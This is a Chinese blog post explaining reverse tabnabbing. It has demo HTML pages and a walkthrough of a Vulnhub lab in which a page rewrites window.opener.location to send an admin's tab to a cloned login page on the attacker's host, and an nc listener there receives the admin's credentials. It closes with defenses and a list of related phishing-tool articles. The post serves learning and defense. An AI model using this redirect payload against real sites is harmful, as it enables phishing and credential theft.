浅谈对tabnabbing漏洞的理解和利用

已于 2022-04-05 14:33:19 修改
阅读量3.9k 收藏 3
点赞数 1
分类专栏: 相关漏洞的学习 文章标签: 安全漏洞 linux 安全 javascript
于 2022-04-05 13:45:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SoporAeternus12/article/details/123965660
版权

最近在打vulnhub上的靶机的时候卡在了某个点,后来我去网上搜索相关攻略,发现了一个叫reverse tabnabbing的漏洞,由于我之前并没有学习过这个漏洞,所以写了这篇文章来记录一下对这个漏洞的学习成果。

漏洞原理和介绍

tabnabbing是一种钓鱼攻击漏洞,网上将该漏洞翻译为反向标签劫持攻击,大致原理就是黑客通过某种方法在页面A中植入一个a标签,也就是一个超链接,链接的指向是黑客精心准备的页面B,页面B的内容有一个javascript代码,内容就是window.opener.location=“C页面的链接”,这句话的意思是如果用户点击了该链接,那么window.opener这个对象就是原链接也就是A页面的window对象,这样原页面就跳转到了C页面,而C页面也是黑客准备的与A页面非常相似的钓鱼页面,并且此时用户并没有发现A页面已经变成了C页面,于是用户继续在C页面浏览或登录等一些操作,导致了信息的泄露。

漏洞产生的原因和条件

该漏洞产生的条件有
1.该页面存在xss漏洞,能够执行用户输入的js脚本
2.用户能够使用a标签,且target=_blank,没有使用rel=noopener/noreferrer属性
对于rel的介绍,可以看看这篇教学:rel介绍

漏洞的演示

首先是A页面(正常页面)

<html>
<title>A页面</title>
 <body>
  <li><a href="http://localhost/b.html" rel="opener" target="_blank" >点击进入B页面</a></li>
  <button onclick="window.open('http://localhost/b.html')">点击进入B页面</button>
 </body>
</html>

然后是B页面(黑客准备的跳转页面)

<html>
<title>B页面</title>
 <body>
  <script>
   if (window.opener) {
      window.opener.location = "http://localhost/c.html";
   }else{alert("跳转失败");}
  </script>
 </body>
</html>

最后是C页面(钓鱼页面)

<!DOCTYPE html>
<html>
<head>
    <title>C页面</title>
</head>
<body>
<li><a href="http://localhost/b.html" rel="opener" target="_blank">点击进入B页面</a></li>
  <button onclick="window.open('http://localhost/b.html')">点击进入B页面</button>
</body>
</html>

用户进入A页面后
A页面展示
点击其中一个链接(这两个链接都能实现同样的效果)
B页面和C页面
可以注意到点击之后弹出了B页面,并且原来的A页面跳转到了C页面
C页面
C页面的设计和A页面一模一样,这样能够很大程度上欺骗用户,中了黑客的套。

相关漏洞的实战

在漏洞实战这里,我选择的是vulnhub网站提供的一个靶机,靶机地址.
这里我省略了信息搜集等其他步骤,直奔主题吧。
大致内容就是目标服务器开放了80和22端口,打开目标网站后注册一个用户并登录
该网站的内容
该网站的内容就是用户提交一个链接,管理员会对这个链接进行检查,并将该链接公布出来。
例如这里先提交百度的链接
在这里插入图片描述
在这里插入图片描述
点击Here后就会跳到https://www.baidu.com这个网页。再看看源代码
在这里插入图片描述
从源代码不难看出,这里就存在reverse tapnabbing攻击,所以对于这个靶机的思路是这样的,我们首先在本地编写好之前所说的B页面和C页面,然后在这个页面中提交B页面的地址,后面管理员会对B页面进行检查,也就是点击B页面,从而达到钓鱼攻击的目的。

这里我现在kali中创建好B页面和C页面。
B页面的代码(.158是本机kali的地址,跳转到.158的1234端口上)

<html>
<title>B页面</title>
 <body>
  <script>
   if (window.opener) {
      window.opener.location = "http://192.168.157.158:1234/c.html";
   }else{alert("跳转失败");}
  </script>
 </body>
</html>

C页面的代码就和原先靶机网站的登录界面的代码一样(复制粘贴或者wget下来都可以)
然后我们打开kali的80端口并提供web服务,打开1234端口并监听

python -m http.server 80
nc -lvvp 1234

然后在靶机中提交http://192.168.157.158/b.html
在这里插入图片描述
提交完成之后就等待管理员的检查了。
在这里插入图片描述
等待一段时间后发现管理员传了用户名和密码过来
在这里插入图片描述
这样整个漏洞利用就成功了。至于对该靶机剩下的内容不是本文章要讨论的范围,这里就不继续说了。

如何防御tabnabbing

在a标签中的rel设置noopener
手动设置opener api

var otherWindow = window.open();
otherWindow.opener = null;
otherWindow.location = url;

以上就是我对tabnabbing漏洞的理解,目前chrome(kali的firefox下貌似也一样)下,a标签的rel属性默认值就是noopener,对于漏洞的测试还需要自己手动修改rel属性。如果以上有错误的地方,还请各位大佬多多指点。

W3de
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Reverse Tabnabbing钓鱼
SoulCat
02-27 1429
Reverse Tabnabbing钓鱼 希望你以后能过得好,别辜负我一生不打扰 文章目录Reverse Tabnabbing钓鱼原理:利用:修复: 原理: 使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面A页面,进而无征兆把访问正常网站A页面修改为钓鱼网站C页面。 两个可以利用点: 1、使用a标签,并且target=_blank,没有使用re...
Tabnabbing Fighter:Phishing Attack Protection-crx插件
03-23
保护您免受Tabnabbing网络钓鱼攻击 Tabnabbing战斗机:保护您免受Tabnabbing网络钓鱼攻击! 浏览安全快乐,无需担心标签被打扰! 了解什么是Tabnabbing-Tabnabbing是一种计算机利用和网络钓鱼攻击,通过假冒那些网站并说服用户该网站是真实的,说服用户向流行的网站提交其登录详细信息和密码。 该攻击利用了用户对选项卡的信任和对细节的不重视,并且使浏览器能够在页面加载后很长一段时间内在非活动选项卡中浏览页面的原始位置。 Tabnabbing与大多数网络钓鱼攻击的不同之处在于,用户不再记得某个选项卡是与登录页面无关的链接的结果,因为假冒的登录页面已加载到浏览器中一个长期打开的选项卡中。我们不希望的是,当我们不浏览时,我们一直在浏览的页面会在背后发生变化。 这会让我们感到惊讶。 支持语言:English
你不知道的 Blob
奇舞周刊
06-08 545
如果你允许用户从你的网站上下载某些文件,那你可能会遇到 Blob 类型。为了实现上述的功能,你可以很容易从网上找到相关的示例,并根据实际需求进行适当的调整。对于部分开发者来说,在完成上述...
metasploit的SET的Credential Harvester Attack Method
天元喜羊羊的博客
05-29 1428
环境:BT5,XP或者Win7,IE6、IE8、谷歌浏览器 操作如下: root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 1001
bing浏览器_Edge浏览器漏洞:如果用户将搜索引擎设为Google,软件会不断崩溃
weixin_39723920的博客
11-14 267
微软Edge浏览器的一个令人费解的错误是,当默认搜索工具设置为bing时,它不会出错,但是设置为谷歌的Chrome就会出错微软的新Edge浏览器继续使用户感到愤怒,因为当用户单击地址栏进行搜索时,它一直崩溃。在谷歌Chrome浏览器和其它众多网络浏览器中,用户习惯于通过浏览器的地址栏来搜索任何东西。Edge浏览器令人困惑的错误只有在用户将默认搜索引擎设置为Google时才会发生。如果用户切换到默认...
kali客户端攻击
abg49988的博客
11-19 280
浏览器攻击 browser_autpwn2 (BAP2)  mkdir /test  为接受响应的服务器创建目录 use auxiliary/server/browser_autopwn2 set SRVHOST 192.168.56.1 set URIPATH /test   #假设我们的攻击目标是 PC,并不打算依赖于 Adobe Flash 的授权。我们会排除 A...
信息安全_浏览器魔术.pptx
08-14
在IT安全领域,"浏览器魔术"主要指的是利用浏览器的特性和漏洞进行的各种欺骗攻击。这些攻击通常涉及到用户界面的篡改,从而误导用户进行危险操作。以下将详细介绍标题和描述中提到的四个关键知识点。 **一、URL...
前端大师-高级Web开发测验
最新发布
05-02
根据给定的信息,我们可以整理出如下关键知识点: ### 1. 脚本加载与执行顺序 ...以上知识点涵盖了高级 Web 开发中的一些核心概念和技术细节,对于深入理解 Web 应用的运行机制和优化策略非常重要。
LearningSecurity
03-17
网路同源策略HTTP请求头SSL / TLSXSSXXE标签页劫持(Tabnabbing) SQL注入宽字节注入DOS版重做慢速HTTP正则表达式盲注文件上传反映文件下载拉链炸弹CRLFCSRFSSRF罪行投毒拒绝服务HTTP请求走私WebShell的MISC作业...
社工钓鱼tabnapping反向标签劫持
tpaer的博客
10-06 1156
通过tabnapping反向标签劫持钓鱼手段获取管理员的账号密码。
Vulnhub 靶机 Napping 1.0.1 write up Reverse Tabnabbing钓鱼 修改root权限的定时py文件 + vim 提权
YouthBelief的博客
01-12 1641
0x00 环境准备 下载地址 https://www.vulnhub.com/entry/napping-101,752/ 靶机介绍 Name: Napping: 1.0.1 Date release: 22 Oct 2021 Author: hadrian3689 Series: Napping Description Even Admins can fall asleep on the job 虚拟机 Virtualbox 仅主机 kali也用该网
网络钓鱼攻击类型,载体及其技术途径
一智哇的博客
03-27 3493
A survey of phishing attacks: Their types, vectors, and technical approaches 一份调查网络钓鱼攻击类型,载体及其技术途径得报告 1.背景 (1)刊物/会议级别 Expert Systems With Applications CCF C 2018年3月27日 (2)作者团队 Kang Leng Chiew, Kelvin Sheng Chek Yong∗ , Choon Lin Tan 马来西亚沙捞越大学计算机科学与信息技术学
渗透测试 ( 9 ) --- 社会工程攻击工具 setoolkit
墨鱼菜鸡
07-11 2061
github 地址:https://github.com/trustedsec/social-engineer-toolkit kali工具 -- setoolkit(克隆网站及利用):https://blog.csdn.net/weixin_41489908/article/details/103851057 1、社会工程学概念 社会工程学通常以...
Multi-Attack Web Method
天元喜羊羊的博客
06-29 2265
操作如下: root@bt:~# cd /pentest/exploits/set/ root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 10
《metasploit The PenetrationTester's Guide》读书笔记v2
aurora__的博客
04-26 676
转自吐司,原地址找不到了,希望作者看见能联系,给我个加上原博客地址的机会..笔芯❤️修订说明:v2版全面使用bt5 r1作为测试系统,对笔记中存在的众多错误和遗漏作了更正和补充;目录一.名词解释二.msf基础三.信息探测与收集四.基本漏洞扫描五.基础溢出命令六.METERPRETER七.避开杀软八.使用用户端攻击方式(client-side attacks)九.MSF 附加模块十.社会工程学工具集...
渗透测试学习之靶机napping-1.0.1
xdbzdgx的博客
04-30 1177
前期准备 1.下载靶机Napping-1.0.1WebGOAT: 1 ~ VulnHub 1.载入vmware,网络模式设置为NAT kali IP地址为192.168.88.128 靶机 IP地址为192.168.88.129 一 、信息收集 1.使用nnamp扫描器扫描开放的端口 nmap -T4 -sV -p- 192.168.88.129 发现开放了80端口和22远程控制端口 2.寻找web信息 访问后发现需要登录,随即注册账号并登录。 此处..
安全系列】setoolkit钓鱼
热门推荐
叁滴水 的博客
07-26 1万+
setoolkit是一个为社会工程设计的开源渗透测试框架。SET具有许多自定义攻击向量,可让您快速进行可信的攻击。 setoolkit 目录结构 modules readme README.md requirements.txt seautomate seproxy setoolkit setup.py seupdate src **setoolkit启动 ** 通过./setoolkit启动。看到如下图形,启动成功。 默认会有如下选项 Social-Engineering Attacks
前端页面劫持和反劫持
xuyuwas的博客
10-11 3795
前端页面劫持和反劫持 页面劫持 使用HTTP请求请求一个网站页面的时候,网络运营商会在正常的数据流中插入精心设计的网络数据报文,让客户端(通常是浏览器)展示“错误”的数据,通常是一些弹窗,宣传性广告或者直接显示某网站的内容。 常见劫持手段 跳转型劫持: 用户输入地址A,但是跳转到地址B 为了获取流量,一些电商或者类似百度这样需要流量合作的网站都会有自己的联盟系统,通过给予一些奖励来获取导流,比...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值